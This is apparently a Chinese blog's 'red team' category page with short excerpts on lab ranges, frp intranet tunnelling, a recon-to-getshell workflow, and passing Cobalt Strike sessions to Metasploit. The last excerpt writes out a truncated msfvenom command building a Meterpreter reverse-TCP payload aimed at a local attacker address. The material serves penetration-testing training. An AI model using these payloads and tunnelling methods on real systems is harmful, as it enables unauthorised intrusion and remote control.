随笔分类 - 红队
摘要:描述 红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。另外本次实战完全模拟ATT&CK攻击链路进行搭建,开成完整闭环。后续也会搭建真实APT实战环境,从实战中成长。关于环境可以模拟出各种各样实战路线,目前给出作者实战的一套攻击实战路线如下,虚拟机所有统一密
阅读全文
摘要:frp使用 frp是一个专注内网穿透的高性能的反向代理应用,支持TCP、UDP、HTTP、HTTPS等多种协议。可以将内网服务以安全、便捷的方式通过具有公网IP节点的中专暴露到公网。 实验:配置frp,使得可以从外网访问内网远程桌面(3389) 1. frps 即frp的服务端,用于部署在公网的服务
阅读全文
摘要:打点基本方法 基本方法,信息搜集->找脆弱资产->漏洞利用->getshell 使用oneforall来跑一遍 --> 得到一堆子域名 拿到这一堆子域名丢给Eeyes跑一遍 --> 得到对应子域名对应的ip和c段信息 将对应ip和c段丢给fofa和fscan、awvs --> fofa能快速得到c段
阅读全文
摘要:使用Cobalt Strike生成的会话和MSF相互连接,在内网渗透中,可以方便后期的渗透。 一、Cobalt Strike连接MSF会话 1. 上线msf会话 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.106 lport
阅读全文